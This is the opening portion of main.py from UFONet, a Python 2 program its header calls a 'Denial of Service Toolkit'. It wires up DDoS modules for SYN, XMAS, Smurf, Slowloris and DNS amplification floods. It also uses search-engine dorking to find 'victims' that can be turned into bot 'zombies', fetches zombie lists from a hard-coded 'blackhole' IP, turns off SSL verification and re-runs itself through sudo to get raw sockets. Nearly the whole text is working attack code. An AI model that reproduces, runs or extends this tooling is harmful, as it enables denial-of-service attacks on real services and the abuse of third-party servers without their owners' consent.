main.py 213 KB


 1. #!/usr/bin/env python
 2. # -*- coding: utf-8 -*-"
 3. """
 4. UFONet - Denial of Service Toolkit - 2013/2019 - by psy (epsylon@riseup.net)
 5. You should have received a copy of the GNU General Public License along
 6. with UFONet; if not, write to the Free Software Foundation, Inc., 51
 7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 8. """
 9. import os, sys, re, traceback, random, time, threading, base64, string, math
 10. import StringIO, socket, httplib, urllib, urllib2, ssl, cgi, json, gzip
 11. from uuid import getnode
 12. from urlparse import urlparse
 13. from random import randrange, shuffle
 14. from options import UFONetOptions
 15. from update import Updater
 16. from herd import Herd
 17. from zombie import Zombie
 18. from doll import Doll
 19. from core.tools.inspector import Inspector
 20. from core.tools.abductor import Abductor
 21. from core.tools.ufoscan import UFOSCAN
 22. from core.mods.loic import LOIC
 23. from core.mods.loris import LORIS
 24. from core.mods.ufosyn import UFOSYN
 25. from core.mods.spray import SPRAY
 26. from core.mods.smurf import SMURF
 27. from core.mods.xmas import XMAS
 28. from core.mods.nuke import NUKE
 29. from core.mods.tachyon import TACHYON
 30. class UFONet(object):
 31. def __init__(self):
 32. self.exit_msg = 'Donate BTC (Bitcoin) to keep UFONet (https://ufonet.03c8.net) strong!' # set msg show at the end [FILO ;-)]
 33. self.GIT_REPOSITORY = 'https://code.03c8.net/epsylon/ufonet' # oficial code source [OK! 22/12/2018]
 34. self.GIT_REPOSITORY2 = 'https://github.com/epsylon/ufonet' # mirror source [since: 04/06/2018]
 35. self.blackhole = '176.28.23.46' # default download/upload zombies [Blackhole] / Try [DIY] your own mirror
 36. self.external_check_service1 = 'https://downforeveryoneorjustme.com/' # set external check service 1 [OK! 28/02/2019]
 37. self.external_check_service2 = 'https://status.ws/' # set external check service 2 [OK! 28/02/2019]
 38. self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
 39. self.check_ip_service1 = 'https://checkip.dyndns.com/' # set external check ip service 1 [OK! 28/02/2019]
 40. self.check_ip_service2 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 28/02/2019]
 41. self.check_ip_service3 = 'https://ip.42.pl/ra' # set external check ip service 3 [OK! 28/02/2019]
 42. self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
 43. self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names
 44. self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve [Zombies]
 45. self.aliens_file = 'botnet/aliens.txt' # set source path to retrieve [Aliens]
 46. self.droids_file = 'botnet/droids.txt' # set source path to retrieve [Droids]
 47. self.ucavs_file = 'botnet/ucavs.txt' # set source path to retrieve 'ucavs'
 48. self.rpcs_file = 'botnet/rpcs.txt' # set source path to retrieve 'rpcs'
 49. self.humans_file = 'botnet/humans.txt' # set source path to retrieve 'humans'
 50. self.dorks_file = 'botnet/dorks.txt' # set source path to retrieve [Dorks]
 51. self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats
 52. self.timeline_file = 'docs/VERSION' # set source for code releases
 53. self.news_file = "server/news.txt" # set source path to retrieve [Blackhole] [News]
 54. self.missions_file = "server/missions.txt" # set source path to retrieve [Blackhole] [Missions]
 55. self.board_file = "server/board.txt" # set source path to retrieve [Blackhole] [Board]
 56. self.grid_file = "server/grid.txt" # set source path to retrieve [Blackhole] [Grid]
 57. self.wargames_file = "server/wargames.txt" # set source path to retrieve [Blackhole] [Wargames]
 58. self.examples_file = "docs/examples.txt" # set source path to retrieve [Examples]
 59. self.misc_file = "core/txt/misc.txt" # set source path to retrieve [Miscellania] cites
 60. self.referer = '' # black magic
 61. self.port = "8080" # default injection port
 62. self.mothershipname = "core/txt/shipname.txt"
 63. self.mothership_baptism() # generating static name/id for your mothership ;-)
 64. self.head = False
 65. self.payload = False
 66. self.external = False
 67. self.attack_mode = False
 68. self.connection_failed = False
 69. self.total_possible_zombies = 0
 70. self.herd = Herd(self)
 71. self.sem = False
 72. self.db_flash = 0 # db stress counter
 73. self.total_aliens = 0
 74. self.aliens_hit = 0
 75. self.aliens_fail = 0
 76. self.total_droids = 0
 77. self.droids_hit = 0
 78. self.droids_fail = 0
 79. self.total_ucavs = 0
 80. self.ucavs_hit = 0
 81. self.ucavs_fail = 0
 82. self.total_rpcs = 0
 83. self.rpcs_hit = 0
 84. self.rpcs_fail = 0
 85. self.total_loic = 0
 86. self.total_loris = 0
 87. self.total_syn = 0
 88. self.total_spray = 0
 89. self.total_smurf = 0
 90. self.total_xmas = 0
 91. self.total_nuke = 0
 92. self.total_tachyon = 0
 93. self.total_zombies_failed_connection = 0
 94. self.ctx = ssl.create_default_context() # creating context to bypass SSL cert validation (black magic)
 95. self.ctx.check_hostname = False
 96. self.ctx.verify_mode = ssl.CERT_NONE
 97. self.nat_error_flag = "OFF"
 98. self.trans_zombies = 0
 99. self.scanned_zombies = 0
 100. self.loadcheck_counter = 0
 101. self.loadcheck_prev_size = None
 102. self.loadcheck_prev_load = None
 103. self.loadcheck_first_size = None
 104. self.loadcheck_first_load = None
 105. self.loadcheck_size_list = []
 106. self.loadcheck_load_list = []
 107. self.loadcheck_size_median = None
 108. self.loadcheck_size_max = None
 109. self.loadcheck_size_min = None
 110. self.loadcheck_load_median = None
 111. self.loadcheck_size_max = None
 112. self.loadcheck_size_min = None
 113. self.num_is_up = 0 # counter for [UCAVs] 'up' reports
 114. self.num_is_down = 0 # counter for [UCAVs] 'down' reports
 115. self.expire_timing = 30 # default expiring time per round
 116. self.extra_zombies_lock = False # used to lock threading flow when [ARMY] is required
 117. self.ac_control = [] # used by 'herd.py' to lock threading flow when [Zombies] are returning
 118. def mothership_baptism(self):
 119. if os.path.exists(self.mothershipname) == True:
 120. f = open(self.mothershipname)
 121. self.mothership_id = f.read()
 122. f.close()
 123. else:
 124. self.mothership_ids = []
 125. f = open(self.motherships_file)
 126. motherships = f.readlines()
 127. f.close()
 128. for ship in motherships:
 129. self.mothership_ids.append(base64.urlsafe_b64encode(ship))
 130. self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()))
 131. m = open(self.mothershipname, "w") # write mothership name to a static file as a baptism
 132. m.write(str(self.mothership_id.upper()))
 133. m.close()
 134. def create_options(self, args=None):
 135. self.optionParser = UFONetOptions()
 136. self.options = self.optionParser.get_options(args)
 137. if not self.options:
 138. return False
 139. return self.options
 140. def banner_welcome(self):
 141. print " 0===============================================0"
 142. print " || ||"
 143. print " (00) || * Botnet -> [DDoS]: ||"
 144. print " (O)_ (O) '----' (O) _(O) || /Zombies : HTTP GET bots ||"
 145. print " | |.''.( xx ).''.| | || /Droids : HTTP GET (+params) bots ||"
 146. print " .'.' |'..'| '.'. || /Aliens : HTTP POST bots ||"
 147. print " .-. .' /'--.__|_00_|__.--'\ '. .-. || /UCAVs : Web Abusing bots ||"
 148. print " (O).)-|0| \ x | ## |x / |0|-(.(O) || /X-RPCs : XML-RPC bots ||"
 149. print " `-' '-'-._'-./ -00- \.-'_.-'-' `-' || /DBSTRESS: HTTP DB attack ||"
 150. print " _ | || '-.___||___.-' || | _ || /SPRAY : TCP-SYN reflector ||"
 151. print " .' _ | ||==O | __ | O==|| | _ '. || /SMURF : ICMP echo flooder ||"
 152. print " / .' ''.| || | /_00_\ | || |.'' '. \ || /TACHYON : DNS amplificator ||"
 153. print " | '### | =| | ###### | |= |' ### | || ||"
 154. print " | |(0)| '. 0\||__**_ ||/0 .' |(0)| | || * Close Combat -> [DoS]: ||"
 155. print " \ '._.' '. | \_##_/ | .' '._.' / || /LOIC : Fast HTTP requests ||"
 156. print " '.__ ____0_'.|__'--'__|.'_0____ __.' || /LORIS : Slow HTTP requests ||"
 157. print " .'_.-| |-._'. || /UFOSYN : TCP-SYN flooder ||"
 158. print " || /XMAS : TCP-XMAS flooder ||"
 159. print " + Class: UFONet / ViPR404+ (model F) + || /NUKE : TCP-STARVATION attack ||"
 160. print " || ||"
 161. print " 0|=============================================|0"
 162. print ""
 163. def banner(self):
 164. print '='*75, "\n"
 165. print "888 888 8888888888 .d88888b. 888b 888 888 "
 166. print "888 888 888 d88P Y888b 8888b 888 888 "
 167. print "888 888 888 888 888 88888b 888 888 "
 168. print "888 888 8888888 888 888 888Y88b 888 .d88b. 888888 "
 169. print "888 888 888 888 888 888 Y88b888 d8P Y8b 888 "
 170. print "888 888 888 888 888 888 Y88888 88888888 888 "
 171. print "Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. "
 172. print " 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888"
 173. print self.optionParser.description, "\n"
 174. print '='*75
 175. def generate_exit_msg(self):
 176. f = open(self.misc_file)
 177. m = f.readlines()
 178. f.close()
 179. self.exit_msg = "Generating random exit... \n\n"
 180. self.exit_msg += " -> "+str(random.choice(m).strip())
 181. def AI(self):
 182. try:
 183. import turtle as AI
 184. print "\n[AI] Making a unique drawing using 'Turtle' (Feurzig & Papert - 1966) -> [OK!]\n"
 185. colors = ['red', 'purple', 'blue', 'green', 'orange', 'yellow']
 186. bg = random.choice(colors).strip()
 187. t = AI.Pen()
 188. AI.bgcolor(bg)
 189. r = random.randrange(100,100000)
 190. for x in range(r):
 191. t.pencolor(colors[x%6])
 192. w = random.randrange(100,1000)
 193. t.width(x/w + 1)
 194. t.forward(x)
 195. l = random.randrange(50,1000)
 196. t.left(l)
 197. except:
 198. print "[AI] %!$1#9#84#~... -> [Exiting!]"
 199. pass
 200. def round_float(self, num):
 201. return str(int(round(num, -1)))[2] # black magic
 202. def show_mac_address(self):
 203. mac = getnode() # to get physical address
 204. hex_mac = str(":".join(re.findall('..', '%012x' % mac)))
 205. return hex_mac
 206. def show_ips(self):
 207. import requests
 208. try:
 209. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 210. s.connect(("8.8.8.8", 80))
 211. private_ip = s.getsockname()[0] # black magic
 212. s.close()
 213. except:
 214. private_ip = "Unknown"
 215. try:
 216. public_ip = requests.get(self.check_ip_service3).text
 217. except:
 218. try:
 219. public_ip = requests.get(self.check_ip_service2).text
 220. except:
 221. try:
 222. public_ip = requests.get(self.check_ip_service1).text
 223. except:
 224. public_ip = "Unknown"
 225. return private_ip, public_ip
 226. def try_running(self, func, error, args=None):
 227. options = self.options
 228. args = args or []
 229. try:
 230. return func(*args)
 231. except Exception as e:
 232. if options.verbose:
 233. print(error, "error")
 234. traceback.print_exc()
 235. def checkeuid(self):
 236. try:
 237. euid = os.geteuid()
 238. except:
 239. print("[Error] [AI] [UFONet] doesn't work correctly in systems with closed licenses...-> [Exiting!]\n")
 240. print "[AI] "+self.exit_msg+"\n"
 241. sys.exit(2) # return
 242. return euid
 243. def start_ship_engine(self):
 244. self.agents = [] # generating available user-agents
 245. f = open(self.agents_file)
 246. agents = f.readlines()
 247. f.close()
 248. for agent in agents:
 249. self.agents.append(agent)
 250. self.user_agent = random.choice(self.agents).strip()
 251. self.search_engines = [] # available dorking search engines
 252. self.search_engines.append('bing') # [28/02/2019: OK!]
 253. self.search_engines.append('yahoo') # [28/02/2019: OK!]
 254. self.search_engines.append('startpage') # [28/02/2019: OK!]
 255. self.search_engines.append('duck') # [28/02/2019: OK!]
 256. #self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
 257. #self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
 258. if not os.path.exists("core/json/"): # create gui json cfg files folder
 259. os.mkdir("core/json/")
 260. self.banner_welcome()
 261. self.update_flying_stats() # update flying time stats
 262. chargo = self.check_mothership_chargo() # check mothership chargo
 263. self.update_max_chargo(int(chargo)) # update max chargo stats
 264. self.generate_exit_msg() # generate random exit msg
 265. def run(self, opts=None):
 266. if opts:
 267. self.create_options(opts)
 268. options = self.options
 269. # start threads
 270. if not self.options.threads:
 271. self.options.threads=5 # default number of threads
 272. self.sem = threading.Semaphore(self.options.threads)
 273. # start ship engine
 274. self.start_ship_engine()
 275. # check proxy options
 276. proxy = options.proxy
 277. if options.proxy:
 278. try:
 279. pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
 280. m = re.search(pattern, proxy)
 281. if m is None:
 282. self.banner()
 283. print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
 284. return
 285. else:
 286. self.proxy_transport(options.proxy) # create proxy transport (also here, to be sure)
 287. except Exception:
 288. self.banner()
 289. print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
 290. return
 291. # check tor connection
 292. if options.checktor:
 293. url = self.check_tor_url # TOR status checking site
 294. self.banner()
 295. print "\nSending request to: " + url + "\n"
 296. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 297. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 298. try:
 299. if options.proxy: # set proxy
 300. self.proxy_transport(options.proxy)
 301. req = urllib2.Request(url, None, headers)
 302. tor_reply = urllib2.urlopen(req, context=self.ctx).read()
 303. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
 304. if not tor_reply or 'Congratulations' not in tor_reply:
 305. print("It seems that Tor is not properly set.\n")
 306. print("IP address appears to be: " + your_ip + "\n")
 307. else:
 308. print("Congratulations!. Tor is properly being used :-)\n")
 309. print("IP address appears to be: " + your_ip + "\n")
 310. except:
 311. print("Cannot reach TOR checker system!. Are you correctly connected?\n")
 312. sys.exit(2) # return
 313. # run AES256+HMAC-SHA1 enc/dec tool
 314. if options.cryptomsg:
 315. from server.crypter import Cipher
 316. from base64 import b64encode, b64decode
 317. print " "
 318. print " ____...------------...____ "
 319. print " _.-'' /o/__ ____ __ __ __ \o\_`'-._ "
 320. print " .' / / \ \ '. "
 321. print " |=====/o/======================\o\=====| "
 322. print " |____/_/________..____..________\_\____| "
 323. print " / _/ \_ <_o#\__/#o_> _/ \_ \ "
 324. print " \__/_____\####/0213411543/####/_____\__/ "
 325. print " |===\!/========================\!/===| "
 326. print " | |=| .---. |=| | "
 327. print " |===|o|=========/ \========|o|===| "
 328. print " | | | \() ()/ | | | "
 329. print " |===|o|======{'-.) A (.-'}=====|o|===| "
 330. print " | __/ \__ '-.\uuu/.-' __/ \__ | "
 331. print " |==== .'.'^'.'.====|====.'.'^'.'.====| "
 332. print " | _\o/ __ {.' __ '.} _ _\o/ _| "
 333. print " '''''''''''''''''''''''''''''''''''''' "
 334. print "\nUFONet Crypter (AES256+HMAC-SHA1)\n"
 335. print " -> (140 plain text chars = 69 encrypted chars)\n"
 336. text = str(raw_input("- Enter text: "))
 337. input_key = str(raw_input("- Enter key: "))
 338. key = b64encode(input_key)
 339. c = Cipher(key, text)
 340. msg = c.encrypt()
 341. c.set_text(msg)
 342. print '\n-> Ciphertext: [', msg, ']'
 343. print '\nLength:', len(msg)
 344. print '\n-> Key (share it using SNEAKNET!):', input_key
 345. print '\nDecryption PoC:', c.decrypt(), "\n"
 346. # run shownet tool
 347. if options.shownet:
 348. hex_mac = self.show_mac_address()
 349. self.banner()
 350. print "-> Network Info:"
 351. print '='*44
 352. print "-"*35
 353. print "|- MAC Address :", hex_mac
 354. print "|" +"-"*34
 355. private_ip, public_ip = self.show_ips()
 356. print "|- IP Private :", private_ip
 357. print "|" +"-"*34
 358. t = urlparse(self.check_ip_service3)
 359. name_service = t.netloc
 360. print "|- IP Public :", public_ip +" | ["+name_service+"]"
 361. print "-"*35
 362. print '='*75, "\n"
 363. # run UFOSCAN tool (check EUID when running UFOSCAN)
 364. if options.xray:
 365. euid = self.checkeuid()
 366. if euid != 0:
 367. print("[Info] [AI] [Control] [UFOSCAN] (--xray) not started as root...\n")
 368. try:
 369. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 370. os.execlpe('sudo', *args)
 371. except:
 372. pass # keep running
 373. else:
 374. if not options.xrayps:
 375. options.xrayps = str("1-1024") # default scanning ports (1-1024)
 376. ports = options.xrayps
 377. try:
 378. portX, portY = ports.split('-')
 379. try:
 380. portX = int(portX)
 381. portY = int(portY)
 382. except:
 383. portX = 1
 384. portY = 1024
 385. print "[Error] [AI] [UFOSCAN] Something wrong with range of ports selected. Using by default: 1-1024...\n"
 386. except:
 387. portX = 1
 388. portY = 1024
 389. print "[Info] [AI] [UFOSCAN] Not any range of ports selected. Using by default: 1-1024...\n"
 390. self.banner()
 391. print("\n[AI] Analizing target to extract interesting information... Be patient!\n")
 392. print '='*22 + '\n'
 393. try:
 394. self.instance = UFOSCAN() # instance main class for scanning operations
 395. xray = self.instance.scanning(options.xray, portX, portY)
 396. except Exception, e:
 397. print ("[Error] [AI] Something wrong scanning... Not any data stream found! -> [Exiting!]\n")
 398. if self.options.verbose:
 399. traceback.print_exc()
 400. return
 401. # show code timeline
 402. if options.timeline:
 403. f = open(self.timeline_file, 'r')
 404. releases = f.readlines()
 405. f.close()
 406. self.banner()
 407. print "-> Code timeline:"
 408. print '='*44
 409. print "-"*35
 410. for r in releases:
 411. print r.strip('\n')
 412. print "-"*35
 413. print '='*75, "\n"
 414. # print some examples
 415. if options.examples:
 416. f = open(self.examples_file, 'r')
 417. examples = f.readlines()
 418. f.close()
 419. self.banner()
 420. for e in examples:
 421. print e.strip('\n')
 422. # check EUID when running UFOSYN (root required for open 'raw sockets') / GUI will invoke 'sudo' directly
 423. if options.ufosyn:
 424. euid = self.checkeuid()
 425. if euid != 0:
 426. print("[Info] [AI] [Control] [UFOSYN] (--ufosyn) not started as root...\n")
 427. try:
 428. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 429. os.execlpe('sudo', *args)
 430. except:
 431. pass # keep running, but UFOSYN will fail
 432. # check EUID when running SPRAY (root required)
 433. if options.spray:
 434. euid = self.checkeuid()
 435. if euid != 0:
 436. print("[Info] [AI] [Control] [SPRAY] (--spray) not started as root...\n")
 437. try:
 438. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 439. os.execlpe('sudo', *args)
 440. except:
 441. pass # keep running, but SPRAY will fail
 442. # check EUID when running SMURF (root required)
 443. if options.smurf:
 444. euid = self.checkeuid()
 445. if euid != 0:
 446. print("[Info] [AI] [Control] [SMURF] (--smurf) not started as root...\n")
 447. try:
 448. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 449. os.execlpe('sudo', *args)
 450. except:
 451. pass # keep running, but SMURF will fail
 452. # check EUID when running XMAS (root required)
 453. if options.xmas:
 454. euid = self.checkeuid()
 455. if euid != 0:
 456. print("[Info] [AI] [Control] [XMAS] (--xmas) not started as root...\n")
 457. try:
 458. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 459. os.execlpe('sudo', *args)
 460. except:
 461. pass # keep running, but XMAS will fail
 462. # check EUID when running NUKE (root required)
 463. if options.nuke:
 464. euid = self.checkeuid()
 465. if euid != 0:
 466. print("[Info] [AI] [Control] [NUKE] (--nuke) not started as root...\n")
 467. try:
 468. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 469. os.execlpe('sudo', *args)
 470. except:
 471. pass # keep running, but NUKE will fail
 472. # check EUID when running TACHYON (root required)
 473. if options.tachyon:
 474. euid = self.checkeuid()
 475. if euid != 0:
 476. print("[Info] [AI] [Control] [TACHYON] (--tachyon) not started as root...\n")
 477. try:
 478. args = ['sudo', sys.executable] + sys.argv + [os.environ]
 479. os.execlpe('sudo', *args)
 480. except:
 481. pass # keep running, but TACHYON will fail
 482. # search for [Zombies] on search engines results (dorking)
 483. if options.search:
 484. zombies = []
 485. if options.engine:
 486. engine = options.engine
 487. else:
 488. engine = "startpage" # default search engine
 489. try:
 490. self.banner()
 491. if not os.path.exists(self.humans_file) == True:
 492. f = open(self.humans_file, 'w')
 493. f.close()
 494. lf = open(self.humans_file, 'r')
 495. restored = lf.readlines()
 496. zombies_restored = len(restored)
 497. lf.close()
 498. lz = open(self.zombies_file, 'r')
 499. zombies_army = lz.readlines()
 500. for zombie in zombies_army:
 501. zombies.append(zombie) # add zombies from army to the zombies pool
 502. lz.close()
 503. if len(restored) > 0:
 504. print "\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n"
 505. if not self.options.forceyes:
 506. backup_reply = raw_input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
 507. print '-'*25
 508. else:
 509. backup_reply = "Y"
 510. if backup_reply == "n" or backup_reply == "N":
 511. print "\n[Info] [AI] Removing data stored and starting a new search...\n"
 512. os.remove(self.humans_file)
 513. zombies_restored = 0 # flush zombies restored
 514. print '-'*25 + "\n"
 515. else:
 516. print "\n[Info] [AI] Restoring data and starting a new search...\n"
 517. print '-'*25 + "\n"
 518. for zombie in restored:
 519. zombies.append(zombie) # add previous data to zombies pool
 520. if options.allengines:
 521. for e in self.search_engines:
 522. engine = e
 523. print '='*44
 524. print("\n[AI] Searching for zombies using: "+engine+'\n')
 525. print '='*44 + '\n'
 526. self.options.engine = engine
 527. try:
 528. zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
 529. if zombies_chain != None:
 530. for zombie in zombies_chain:
 531. if zombie not in zombies: # evade possible repetitions
 532. zombies.append(zombie)
 533. except:
 534. if zombies: # backup all new zombies found to file in case of exception
 535. for zombie in zombies:
 536. if zombie+os.linesep not in restored: # only append new zombies found
 537. with open(self.humans_file, "a") as f:
 538. f.write(str(zombie+os.linesep))
 539. else:
 540. if restored:
 541. print '='*44
 542. print("\n[AI] Searching for zombies using: "+engine+"\n")
 543. print '='*44 + '\n'
 544. if restored: # from restored file
 545. try:
 546. zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
 547. if zombies_chain != None:
 548. for zombie in zombies_chain:
 549. if zombie not in zombies: # evade possible repetitions
 550. zombies.append(zombie)
 551. except:
 552. if zombies: # backup all new zombies found to file in case of exception
 553. for zombie in zombies:
 554. if zombie+os.linesep not in restored: # only append new zombies found
 555. with open(self.humans_file, "a") as f:
 556. f.write(str(zombie+os.linesep))
 557. else:
 558. try:
 559. zombies = self.search_zombies(dork='', zombies_found=zombies)
 560. except:
 561. if zombies: # backup all new zombies found to file in case of exception
 562. for zombie in zombies:
 563. if zombie+os.linesep not in restored: # only append new zombies found
 564. with open(self.humans_file, "a") as f:
 565. f.write(str(zombie+os.linesep))
 566. total_restored = zombies_restored
 567. new_zombies = 0 # new zombies counter
 568. f = open(self.zombies_file, 'r')
 569. zz = f.readlines()
 570. f.close()
 571. zombies_found = []
 572. for z in zombies:
 573. if z.endswith(os.linesep):
 574. z = z.replace(os.linesep, "")
 575. if z not in zz and z+os.linesep not in zz:
 576. new_zombies = new_zombies + 1
 577. zombies_found.append(z)
 578. print '='*62
 579. print "\n- Victims found:", len(zombies_found), "\n"
 580. print " - Restored:", total_restored
 581. print " - Dorked:", abs(len(zombies_found) - total_restored), "\n"
 582. print '-'*32
 583. print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n"
 584. print '='*62 + '\n'
 585. if len(zombies) > 0:
 586. if not self.options.forceyes:
 587. check_backup_reply = raw_input("[AI] Do you want to save the results for a future search? (Y/n)\n")
 588. print '-'*25
 589. else:
 590. check_backup_reply = "Y"
 591. if check_backup_reply == "n" or check_backup_reply == "N":
 592. if os.path.isfile(self.humans_file):
 593. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
 594. print "\n[Info] [AI] Temporal data correctly removed...\n"
 595. else:
 596. with open(self.humans_file, "w") as f:
 597. for z in zombies_found:
 598. if z.endswith(os.linesep):
 599. z = z.replace(os.linesep, "")
 600. if z not in zz or z+os.linesep not in zz:
 601. f.write(z+os.linesep)
 602. f.close()
 603. print "\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n"
 604. print '-'*25 + "\n"
 605. if new_zombies and new_zombies > 0:
 606. if not self.options.forceyes:
 607. check_url_link_reply = raw_input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
 608. print '-'*25 + "\n"
 609. else:
 610. check_url_link_reply = "Y"
 611. if check_url_link_reply == "n" or check_url_link_reply == "N":
 612. print "[AI] "+self.exit_msg+"\n"
 613. pass
 614. else:
 615. print "\n" + '='*44
 616. test = self.testing(zombies_found)
 617. else:
 618. print "[Info] [AI] NOT any NEW possible zombies found -> [Exiting!]\n"
 619. except Exception:
 620. print ("\n[Error] [AI] Something wrong searching using: "+engine+"\n")
 621. # search for [Zombies] from a list of [Dorks]
 622. if options.dorks:
 623. if options.engine:
 624. engine = options.engine
 625. else:
 626. engine = "startpage" # default search engine
 627. try:
 628. dorks = self.extract_dorks()
 629. if not dorks:
 630. return
 631. zombies = []
 632. self.banner()
 633. if not os.path.exists(self.humans_file) == True:
 634. f = open(self.humans_file, 'w')
 635. f.close()
 636. lf = open(self.humans_file, 'r')
 637. restored = lf.readlines()
 638. zombies_restored = len(restored)
 639. lf.close()
 640. lz = open(self.zombies_file, 'r')
 641. zombies_army = lz.readlines()
 642. for zombie in zombies_army:
 643. zombies.append(zombie) # add zombies from army to the zombies pool
 644. lz.close()
 645. if len(restored) > 0:
 646. print "\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n"
 647. if not self.options.forceyes:
 648. backup_reply = raw_input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
 649. print '-'*25
 650. else:
 651. backup_reply = "Y"
 652. if backup_reply == "n" or backup_reply == "N":
 653. print "\n[Info] [AI] Removing data stored and starting a new search...\n"
 654. os.remove(self.humans_file)
 655. zombies_restored = 0 # flush zombies restored
 656. print '-'*25 + "\n"
 657. else:
 658. print "\n[Info] [AI] Restoring data and starting a new search...\n"
 659. print '-'*25 + "\n"
 660. for zombie in restored:
 661. zombies.append(zombie) # add previous data to zombies pool
 662. total_restored = zombies_restored
 663. if options.allengines:
 664. for e in self.search_engines:
 665. engine = e
 666. print '='*44
 667. print("\n[AI] Searching for zombies using: ["+engine+ "] from a list of [Dorks]\n")
 668. print '='*44 + '\n'
 669. self.options.engine = engine
 670. for dork in dorks:
 671. print '='*22
 672. print "Dork:", dork
 673. print '='*22 + '\n'
 674. try:
 675. dorked_zombies = self.search_zombies(dork, zombies) # AI mode
 676. for zombie in dorked_zombies:
 677. if zombie not in zombies: # evade repetitions for zombies found
 678. zombies.append(zombie)
 679. if zombie+os.linesep not in restored: # only append new zombies found
 680. with open(self.humans_file, "a") as f:
 681. f.write(str(zombie+os.linesep))
 682. f.close()
 683. except:
 684. if zombies: # backup new zombies found on exception
 685. for zombie in zombies:
 686. if zombie+os.linesep not in restored: # only append new zombies found
 687. with open(self.humans_file, "a") as f:
 688. f.write(str(zombie+os.linesep))
 689. f.close()
 690. else:
 691. if restored:
 692. print '='*44
 693. print("\n[AI] Searching for zombies using: ["+ engine+ "] from a list of [Dorks]\n")
 694. print '='*44 + '\n'
 695. for dork in dorks:
 696. print '='*22
 697. print "Dork:", dork
 698. print '='*22 + '\n'
 699. try:
 700. dorked_zombies = self.search_zombies(dork, zombies) # AI mode
 701. if dorked_zombies != None:
 702. for zombie in dorked_zombies:
 703. if zombie not in zombies: # evade repetitions for zombies found
 704. zombies.append(zombie)
 705. except:
 706. if zombies: # backup new zombies found on exception
 707. for zombie in zombies:
 708. if zombie+os.linesep not in restored: # only append new zombies found
 709. with open(self.humans_file, "a") as f:
 710. f.write(str(zombie+os.linesep))
 711. f.close()
 712. new_zombies = 0 # new zombies counter
 713. f = open(self.zombies_file, 'r')
 714. zz = f.readlines()
 715. f.close()
 716. zombies_found = []
 717. for z in zombies:
 718. if z.endswith(os.linesep):
 719. z = z.replace(os.linesep, "")
 720. if z not in zz and z+os.linesep not in zz:
 721. new_zombies = new_zombies + 1
 722. zombies_found.append(z)
 723. print '='*62
 724. print "\n- Victims found:", len(zombies_found), "\n"
 725. print " - Restored:", total_restored
 726. print " - Dorked:", len(zombies_found) - total_restored, "\n"
 727. print '-'*32
 728. print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n"
 729. print '='*62 + '\n'
 730. if len(zombies_found) > 0:
 731. if not self.options.forceyes:
 732. check_backup_reply = raw_input("[AI] Do you want to save the results for a future search? (Y/n)\n")
 733. print '-'*25
 734. else:
 735. check_backup_reply = "Y"
 736. if check_backup_reply == "n" or check_backup_reply == "N":
 737. if os.path.isfile(self.humans_file):
 738. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
 739. print "\n[Info] [AI] Temporal data correctly removed...\n"
 740. else:
 741. with open(self.humans_file, "w") as f:
 742. for z in zombies_found:
 743. if z.endswith(os.linesep):
 744. z = z.replace(os.linesep, "")
 745. if z not in zz or z+os.linesep not in zz:
 746. f.write(z+os.linesep)
 747. f.close()
 748. print "\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n"
 749. print '-'*25 + "\n"
 750. if new_zombies and new_zombies > 0:
 751. if not self.options.forceyes:
 752. check_url_link_reply = raw_input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
 753. print '-'*25 + "\n"
 754. else:
 755. check_url_link_reply = "Y"
 756. if check_url_link_reply == "n" or check_url_link_reply == "N":
 757. print "[AI] "+self.exit_msg+"\n"
 758. pass
 759. else:
 760. print "\n" + '='*44
 761. test = self.testing(zombies_found)
 762. else:
 763. print "[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n"
 764. except Exception:
 765. print ("\n[Error] [AI] Something wrong searching using: "+engine+"\n")
 766. # auto-search for [Zombies] (dorks+all_engines+time -> to discover max new zombies)
 767. if options.autosearch:
 768. try:
 769. dorks = self.extract_dorks()
 770. except:
 771. print "\n[Info] [AI] Not any dork present at: 'botnet/dorks.txt' -> [Aborting!]\n"
 772. return
